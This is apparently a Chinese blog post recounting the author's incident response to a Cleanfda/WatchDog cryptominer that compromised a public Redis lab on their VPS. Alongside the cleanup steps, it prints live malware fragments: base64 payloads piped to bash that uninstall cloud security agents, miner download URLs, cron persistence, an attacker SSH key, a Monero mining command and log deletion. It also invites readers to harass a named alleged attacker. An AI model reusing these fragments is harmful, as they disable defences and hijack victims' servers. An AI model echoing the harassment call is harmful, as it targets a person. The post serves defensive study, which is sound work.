事件的起因还得从我在自己的vps上部署了一个空口令的redis靶场说起,因为我靶场是在公网的(别问我为啥部署在公网,公网打着有感觉),没想到打着打着被别人get shell了,打的时候发现服务器特别卡,然后就收到了腾讯云发的短信提示。于是马上进行应急排查,发现cpu跑到100%了,还有对外攻击行为。好家伙,由此有了以下应急响应的经过。
(正好HW将至,这篇文章也许能帮助各位师傅了解相关挖矿木马的排查)
突然发现用着用着很卡,于是就瞄了一眼cpu使用情况
(我用的是finalShell,左上角可以直接查看),发现到了100%,但是输入了top命令却发现cpu正常,因此猜测应该做了相关进程隐藏。
1、当时和这个情况差不多,当时忘记截图了,找一张补一下。反正就使用top命令正常,但是finanlShell提示cpu到了100%。基本可以确定是被植入了挖矿病毒了。
1、暂停相关进程
首先是暂停掉相关任务,然后删除相关文件,恶意脚本以及应急。因为这里是自己普通使用的云服务器,没有什么业务,而且top显示正常,我就直接reboot重启了。
cpu先恢复正常了。我后面也去查了怎么回事,原来隐藏相关进程是通过修改/etc/ld.so.preload 文件来实现的。这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受这个机制影响的。查看相关文件删除里面的内容即可,然后top命令显示正常即可正式删除。
在 Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD 环境变量和 /etc/ld.so.preload 配置文件中指定的动态链接库依然会被装载,它们的优先级比 LD_LIBRARY_PATH 环境变量所定义的链接库查找路径的文件优先级要高,所以能够提前于用户调用的动态库载入。
——段落引自《警惕利用 Linux 预加载型恶意动态链接库的后门》
2、确定攻击时间
我先找到了一个恶意脚本,发现文件上传的时间在"2024-04-16 17:03"时上传的,相关挖矿程序是一个恶意文件,很快就进行了相关操作,因此确定时间为前后几分钟之类。因此根据这个时间来观察相应操作,
find / -newermt"2024-04-16 17:00" ! -newermt"2024-04-16 17:07"● / 表示从根目录开始搜索,你可以替换为任何特定的目录。● -newermt 选项后面跟一个日期字符串,表示在这个时间之后被修改过的文件。● ! -newermt 表示对上一个选项的结果取反,也就是说排除在此之后修改过的文件。
可以看到如下文件发生了变化。可能有相关计划任务,用户添加,恶意脚本、写入公钥等操作:
/etc/passwd/etc/group/etcshadow/tmp/zzh/root/.ssh/authorized_keys
3、删除相关恶意脚本
开始确定恶意脚本位置后我尝试直接删除,发现删除不了(是的,管理员也不能删除,我嘞个豆)。
我赶紧去请教一位师傅,那位师傅提示我被chattr锁了。我就搜搜chattr是什么。
有以下两种情况文件不可删除:1. chattr 命令的执行文件可能本身的权限被修改了,导致即便root用户也无法执行。2. 文件系统可能是只读挂载的,或者文件系统存在错误。
4、chattr介绍
/usr/bin/chattr是在Linux系统中用于修改文件属性的一个命令,这些属性对文件的保护和维护至关重要。这里有几个重要的文件属性可以通过chattr命令来设置或删除:
i(不可变)属性:当文件设置了这个属性后,没有任何用户(包括root用户)可以修改该文件,这意味着文件不能被删除、重命名、链接也不能修改数据;只能读取。chattr +i filenamea(仅追加)属性:设置了这个属性后,文件只能被追加内容,也就是只能写入而不能删除或修改文件中的数据。chattr +a filenames(安全删除)属性:一旦应用了这个属性,当文件从磁盘上删除时,它的内容会被零填充,以及真实分配的磁盘区域会被释放回磁盘。chattr +s filenameS(同步更新)属性:设置了这个属性后,文件的修改会立即同步到磁盘。chattr +S filenameA(不更新访问时间)属性:通常在读取文件的情况下,文件的访问时间会被更新,如果设置了这个属性,访问时间不会被修改。chattr +A filenamed(不倾倒)属性:当文件系统使用倾倒(dump)备份时,这个属性会阻止文件被倾倒。chattr +d filenameu(不删除)属性:即使删除了该属性的文件,系统也允许你恢复这个删除的文件内容。chattr +u filenamechattr命令需要管理员(root)权限来执行,并且这个命令非常强大,可以有效防止关键文件被恶意修改或删除。
5、既然不可删除,应该有这个i或者a的属性,那我尝试取消这个属性试试呗。但是提示我chatter的权限不够,我去,chatter权限也被更改了
于是我查看chatter权限,发现只有read的权限。
重新赋予其755(root用户rwx,其他用户只有rx)
这时候再取消这个文件的chatter的i权限就可以了,恶意脚本其实还有a权限。都一并取消就好了,这下就可以删除了。
lsattr newinit.sh //查看恶意脚本权限chattr -i newinit.shchattr -a newinit.shrm -rf newinit.sh
6、接着查看相关计划任务
crontab -l/etc/cron.d
大胆妖魔,一眼就看出不是人,杀!杀!杀!删除/etc/cron.d时,也提示无法删除,按照上面恶意脚本删除就好了。
"*/50 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}"*/50 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh"0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab
7、查看添加的用户
查看/etc/passwd、/etc/group、/etcshadow、发现有redis这个用户,继续 杀!杀!杀!
8、检查相关公私钥
查看/root/.ssh/authorized_keys文件,果然被写入了,继续杀!
到这里相关文件也基本上处理干净了
(恶意脚本全部代码有1000多行,这里就不放出来了,有想自己研究研究的师傅私聊把)
脚本具体执行内容如下:
1、关闭防火墙
这里开启使用chatter,然后/tmp目录更改权限,并关闭防火墙。
ulimit-n 65535chmod777 /usr/bin/chattrchmod777 /bin/chattrchattr-iua /tmp/chattr-iua /var/tmp/iptables-Fufwdisable
2、卸载云镜或者阿里云盾
ifps aux | grep -i'[a]liyun';then$bbdirhttp://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdirhttp://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash$bbdirahttp://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdirahttp://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashecho'IyEvYmluL2Jhc2gKCkFFR0lTX0lOU1RBTExfRElSPSIvdXNyL2xvY2FsL2FlZ2lzIgojY2hlY2sgbGludXggR2VudG9vIG9zIAp2YXI9YGxzYl9yZWxlYXNlIC1hIHwgZ3JlcCBHZW50b29gCmlmIFsgLXogIiR7dmFyfSIgXTsgdGhlbiAKCXZhcj1gY2F0IC9ldGMvaXNzdWUgfCBncmVwIEdlbnRvb2AKZmkKY2hlY2tDb3Jlb3M9YGNhdCAvZXRjL29zLXJlbGVhc2UgMj4vZGV2L251bGwgfCBncmVwIGNvcmVvc2AKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbGlmIFsgLWYgIi9ldGMvb3MtcmVsZWFzZSIgLWEgLW4gIiR7Y2hlY2tDb3Jlb3N9IiBdOyB0aGVuCglMSU5VWF9SRUxFQVNFPSJDT1JFT1MiCglBRUdJU19JTlNUQUxMX0RJUj0iL29wdC9hZWdpcyIKZWxzZSAKCUxJTlVYX1JFTEVBU0U9Ik9USEVSIgpmaQkJCgpzdG9wX2FlZ2lzX3BraWxsKCl7CiAgICBwa2lsbCAtOSBBbGlZdW5EdW4gPi9kZXYvbnVsbCAyPiYxCiAgICBwa2lsbCAtOSBBbGlIaWRzID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpSGlwcyA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaU5ldCA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaVNlY0d1YXJkID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpWXVuRHVuVXBkYXRlID4vZGV2L251bGwgMj4mMQogICAgCiAgICAvdXNyL2xvY2FsL2FlZ2lzL0FsaU5ldC9BbGlOZXQgLS1zdG9wZHJpdmVyCiAgICAvdXNyL2xvY2FsL2FlZ2lzL2FsaWhpcHMvQWxpSGlwcyAtLXN0b3Bkcml2ZXIKICAgIC91c3IvbG9jYWwvYWVnaXMvQWxpU2VjR3VhcmQvQWxpU2VjR3VhcmQgLS1zdG9wZHJpdmVyCiAgICBwcmludGYgIiUtNDBzICU0MHNcbiIgIlN0b3BwaW5nIGFlZ2lzIiAiWyAgT0sgIF0iCn0KCiMgY2FuIG5vdCByZW1vdmUgYWxsIGFlZ2lzIGZvbGRlciwgYmVjYXVzZSB0aGVyZSBpcyBiYWNrdXAgZmlsZSBpbiBnbG9iYWxjZmcKcmVtb3ZlX2FlZ2lzKCl7Cmtwcm9iZUFycj0oCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9pbnN0YW5jZXMvYWVnaXNfZG9fc3lzX29wZW4vc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzX2luZXRfY3NrX2FjY2VwdC9zZXRfZXZlbnQiCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9pbnN0YW5jZXMvYWVnaXNfdGNwX2Nvbm5lY3Qvc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzL3NldF9ldmVudCIKICAgICIvc3lzL2tlcm5lbC9kZWJ1Zy90cmFjaW5nL2luc3RhbmNlcy9hZWdpc18vc2V0X2V2ZW50IgogICAgIi9zeXMva2VybmVsL2RlYnVnL3RyYWNpbmcvaW5zdGFuY2VzL2FlZ2lzX2FjY2VwdC9zZXRfZXZlbnQiCiAgICAiL3N5cy9rZXJuZWwvZGVidWcvdHJhY2luZy9rcHJvYmVfZXZlbnRzIgogICAgIi91c3IvbG9jYWwvYWVnaXMvYWVnaXNfZGVidWcvdHJhY2luZy9zZXRfZXZlbnQiCiAgICAiL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19kZWJ1Zy90cmFjaW5nL2twcm9iZV9ldmVudHMiCikKZm9yIHZhbHVlIGluICR7a3Byb2JlQXJyW0BdfQpkbwogICAgaWYgWyAtZiAiJHZhbHVlIiBdOyB0aGVuCiAgICAgICAgZWNobyA+ICR2YWx1ZQogICAgZmkKZG9uZQppZiBbIC1kICIke0FFR0lTX0lOU1RBTExfRElSfSIgXTt0aGVuCiAgICB1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKICAgIGlmIFsgLWQgIiR7QUVHSVNfSU5TVEFMTF9ESVJ9L2Nncm91cC9jcHUiIF07dGhlbgogICAgICAgIHVtb3VudCAke0FFR0lTX0lOU1RBTExfRElSfS9jZ3JvdXAvY3B1CiAgICBmaQogICAgaWYgWyAtZCAiJHtBRUdJU19JTlNUQUxMX0RJUn0vY2dyb3VwIiBdO3RoZW4KICAgICAgICB1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vY2dyb3VwCiAgICBmaQogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX2NsaWVudAogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX3VwZGF0ZQoJcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FsaWhpZHMKICAgIHJtIC1yZiAke0FFR0lTX0lOU1RBTExfRElSfS9nbG9iYWxjZmcvZG9tYWluY2ZnLmluaQpmaQp9Cgp1bmluc3RhbGxfc2VydmljZSgpIHsKICAgCiAgIGlmIFsgLWYgIi9ldGMvaW5pdC5kL2FlZ2lzIiBdOyB0aGVuCgkJL2V0Yy9pbml0LmQvYWVnaXMgc3RvcCAgPi9kZXYvbnVsbCAyPiYxCgkJcm0gLWYgL2V0Yy9pbml0LmQvYWVnaXMgCiAgIGZpCgoJaWYgWyAkTElOVVhfUkVMRUFTRSA9ICJHRU5UT08iIF07IHRoZW4KCQlyYy11cGRhdGUgZGVsIGFlZ2lzIGRlZmF1bHQgMj4vZGV2L251bGwKCQlpZiBbIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiBdOyB0aGVuCgkJCXJtIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiA+L2Rldi9udWxsIDI+JjE7CgkJZmkKICAgIGVsaWYgWyAtZiAvZXRjL2luaXQuZC9hZWdpcyBdOyB0aGVuCiAgICAgICAgIC9ldGMvaW5pdC5kL2FlZ2lzICB1bmluc3RhbGwKCSAgICBmb3IgKCh2YXI9MjsgdmFyPD01OyB2YXIrKykpIGRvCgkJCWlmIFsgLWQgIi9ldGMvcmMke3Zhcn0uZC8iIF07dGhlbgoJCQkJIHJtIC1mICIvZXRjL3JjJHt2YXJ9LmQvUzgwYWVnaXMiCgkJICAgIGVsaWYgWyAtZCAiL2V0Yy9yYy5kL3JjJHt2YXJ9LmQiIF07dGhlbgoJCQkJcm0gLWYgIi9ldGMvcmMuZC9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCQlmaQoJCWRvbmUKICAgIGZpCgp9CgpzdG9wX2FlZ2lzX3BraWxsCnVuaW5zdGFsbF9zZXJ2aWNlCnJlbW92ZV9hZWdpcwp1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKCgpwcmludGYgIiUtNDBzICU0MHNcbiIgIlVuaW5zdGFsbGluZyBhZWdpcyIgICJbICBPSyAgXSIKCgoK'| base64 -d | bashecho'IyEvYmluL2Jhc2gKCiNjaGVjayBsaW51eCBHZW50b28gb3MgCnZhcj1gbHNiX3JlbGVhc2UgLWEgfCBncmVwIEdlbnRvb2AKaWYgWyAteiAiJHt2YXJ9IiBdOyB0aGVuIAoJdmFyPWBjYXQgL2V0Yy9pc3N1ZSB8IGdyZXAgR2VudG9vYApmaQoKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbHNlCglMSU5VWF9SRUxFQVNFPSJPVEhFUiIKZmkKCnN0b3BfYWVnaXMoKXsKCWtpbGxhbGwgLTkgYWVnaXNfY2xpID4vZGV2L251bGwgMj4mMQoJa2lsbGFsbCAtOSBhZWdpc191cGRhdGUgPi9kZXYvbnVsbCAyPiYxCglraWxsYWxsIC05IGFlZ2lzX2NsaSA+L2Rldi9udWxsIDI+JjEKICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgYWVnaXMiICJbICBPSyAgXSIKfQoKc3RvcF9xdWFydHooKXsKCWtpbGxhbGwgLTkgYWVnaXNfcXVhcnR6ID4vZGV2L251bGwgMj4mMQogICAgICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgcXVhcnR6IiAiWyAgT0sgIF0iCn0KCnJlbW92ZV9hZWdpcygpewppZiBbIC1kIC91c3IvbG9jYWwvYWVnaXMgXTt0aGVuCiAgICBybSAtcmYgL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19jbGllbnQKICAgIHJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3VwZGF0ZQpmaQp9CgpyZW1vdmVfcXVhcnR6KCl7CmlmIFsgLWQgL3Vzci9sb2NhbC9hZWdpcyBdO3RoZW4KCXJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3F1YXJ0egpmaQp9CgoKdW5pbnN0YWxsX3NlcnZpY2UoKSB7CiAgIAogICBpZiBbIC1mICIvZXRjL2luaXQuZC9hZWdpcyIgXTsgdGhlbgoJCS9ldGMvaW5pdC5kL2FlZ2lzIHN0b3AgID4vZGV2L251bGwgMj4mMQoJCXJtIC1mIC9ldGMvaW5pdC5kL2FlZ2lzIAogICBmaQoKCWlmIFsgJExJTlVYX1JFTEVBU0UgPSAiR0VOVE9PIiBdOyB0aGVuCgkJcmMtdXBkYXRlIGRlbCBhZWdpcyBkZWZhdWx0IDI+L2Rldi9udWxsCgkJaWYgWyAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgXTsgdGhlbgoJCQlybSAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgPi9kZXYvbnVsbCAyPiYxOwoJCWZpCiAgICBlbGlmIFsgLWYgL2V0Yy9pbml0LmQvYWVnaXMgXTsgdGhlbgogICAgICAgICAvZXRjL2luaXQuZC9hZWdpcyAgdW5pbnN0YWxsCgkgICAgZm9yICgodmFyPTI7IHZhcjw9NTsgdmFyKyspKSBkbwoJCQlpZiBbIC1kICIvZXRjL3JjJHt2YXJ9LmQvIiBdO3RoZW4KCQkJCSBybSAtZiAiL2V0Yy9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCSAgICBlbGlmIFsgLWQgIi9ldGMvcmMuZC9yYyR7dmFyfS5kIiBdO3RoZW4KCQkJCXJtIC1mICIvZXRjL3JjLmQvcmMke3Zhcn0uZC9TODBhZWdpcyIKCQkJZmkKCQlkb25lCiAgICBmaQoKfQoKc3RvcF9hZWdpcwpzdG9wX3F1YXJ0egp1bmluc3RhbGxfc2VydmljZQpyZW1vdmVfYWVnaXMKcmVtb3ZlX3F1YXJ0egoKcHJpbnRmICIlLTQwcyAlNDBzXG4iICJVbmluc3RhbGxpbmcgYWVnaXNfcXVhcnR6IiAgIlsgIE9LICBdIgoKCgo='| base64 -d | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctldisablealiyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -yelifps aux | grep -i'[y]unjing';then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh
3、下载恶意文件
miner_url="http://45.xxx.xxx.29/cleanfda/zzh"miner_url_backup="http://xxxxx.top/cleanfda/zzh"miner_size="2269048"sh_url="http://45.xxx.xxx.29/cleanfda/newinit.sh"sh_url_backup="http://xxxxx.top/cleanfda/newinit.sh"chattr_size="8000"
4、添加计划任务
echo"*/50 * * * * sh /etc/newinit.sh >/dev/null 2>&1"${crondir}echo"*/50 * * * * root sh /etc/newinit.sh >/dev/null 2>&1"/etc/cron.d/zzhecho"0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1"/etc/crontab
5、更改相关文件权限
相关文件加上chattr的ia权限,给chattr只有r权限,这也是为什么我们最开始执行chattr -i newinit.sh失败的原因
chmod777 /tmp/zzhchattr+i /tmp/zzhchmod777 /tmp/newinit.shchattr+i /tmp/newinit.sh
chmod 444 /usr/bin/chattrchmod 444 /bin/chattr
6、写入公钥
chmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1" > /root/.ssh/authorized_keys
7、挖矿代码
./zzh --log-file=/etc/etc --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.xxxx.top:5443 --tls --nicehash --coin monero --background &8、相关进程
chattr -R -ia /usr/bin/TeamTNT/*chattr -R -ia /usr/bin/watchdogd*rm -rf /usr/bin/watchdogd*service crypto stopsystemctl stop crypto.servicesystemctl stop watchdogdservice watchdogd stop
9、删除日志
噢对,相关日志也删除了。nnd
rm -rf /tmp/addres*rm -rf /tmp/walle*rm -rf /tmp/keysrm -rf /var/log/syslog
10、对外攻击
还有一个对外攻击的脚本,我还没有来得及保存就删除了,那个脚本功能应该会下载一个端口扫描的工具,然后对其他网段进行扫描,目的就是扩大感染范围。
1. 通过Redis未授权访问漏洞入侵机器并修改crontab任务
a) 覆写crontab任务;b) 清理其他恶意程序;c) 解锁删除相关系统文件;d) 下载执行恶意文件;e) 横向扫描其他机器;f) 清理相关文件和痕迹。
2. crontab任务执行bash脚本
3. 恶意文件执行实现写开机启动、服务项并释放动态链接库实现隐藏,同时释放执行挖矿程序
# 第一步:首先修改服务器root密码,防止继续攻击# 第二步:尝试恢复chmod774 /usr/bin/chattrchattr-ia /etc/zzh*chattr-ia /etc/newinit.sh*chattr-ia /root/.ssh/authorized_keys*chattr-R -ia /root/.sshrm-rf /etc/zzh*rm-rf /etc/zzhsrm-rf /etc/newinit.sh*rm-rf /etc/init.sh*mv/usr/bin/wd1 /usr/bin/wgetmv/usr/bin/cd1 /usr/bin/curlecho0 > /proc/sys/vm/nr_hugepagessysctl-w vm.nr_hugepages=0chattr-i /etc/resolv.conf 2>/dev/null 1>/dev/nullecho"nameserver x.x.x.x" > /etc/resolv.confecho"nameserver x.x.x.x" >> /etc/resolv.confchattr-R -ia /var/spool/cronchattr-ia /etc/crontabchattr-R -ia /var/spool/cron/crontabschattr-R -ia /etc/cron.drm-rf /etc/cron.d/zzhpkill-f zzhpkillzzhpkill.zzhrm-rf /etc/zzhchattr-ia /tmp/zzh*chattr-ia /tmp/newinit.sh*rm-rf /tmp/zzh*rm-rf /tmp/newinit.sh*pkillpnscanpkillmasscanpkillcd1pkillwd1rm-rf /var/tmp/.ice-unix/rm-rf /tmp/.ice-unix/rm-rf /usr/local/bin/pnscanrm-rf /usr/bin/pnscanrm-rf /usr/local/bin/masscanrm-rf /usr/bin/masscanps-ef | grep 'cleanfda' | awk '{print $2}' |xargs kill -9ps-ef | grep 'newinit.sh' | awk '{print $2}' |xargs kill -9# 查看下more/bin/ps# 如果ps命令也被篡改,则修复下:chattr-ia /bin/psrm-rf /bin/psmv/bin/ps.original /bin/pschattr-ia /bin/toprm-rf /bin/topmv/bin/top.original /bin/topchattr-ia /bin/pstreerm-rf /bin/pstreemv/bin/pstree.original /bin/pstree
至此应急到这基本就结束了,但是突然想起前几天一个小伙伴的公司测试服务器也被植入挖矿了,不过因为是测试服务器,他们直接重装了。
代码如下:
bash代码有高度重合性,可能是同一个组织,让我确定是同一个组织是文件都tnnd的被写入了f**kyou。。。
忍不了了,我倒要看看是什么组织做这种缺德的事,已经知道是Cleanfda这个挖矿类型,那就对这个组织展开调查!
在刚才的一个进程中,我们看到有个进程叫做WatchDog,一般来说进程名都是一个组织的标志之一,还有一个什么TeamTNT?这些都可以作为特征在网上搜索。
通过搜索,确实让我在网上看到了相关组织信息
WatchDog 挖矿作业至少自 2019 年 1 月 27 日起就开始进行,主要收集门罗币加密币 (XMR),主要攻击方式为Docker Remote API未授权访问、配置错误的Kubernetes集群、Redis服务暴力破解或者空口令。
让我意外的是,我直接搜索Teamtnt就让我搜到了一个github相关的地址,从他的仓库看来,貌似为红队工具,八九不离十就是这个人了。
在相关个人信息栏上,他留下了自己的推*用户
“HildeGard@TeamTNT”
好家伙,人找到了,有小伙伴帮我网暴他不?
相关消息表示该组织可能来自德国,因为他们用德语编写其推文和 bash 脚本。所以定位其总部在德国,也有其他组织也定位到该组织位于德国。具体人就不好找了,能力有限。
感谢阅读,关注下呗~~
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论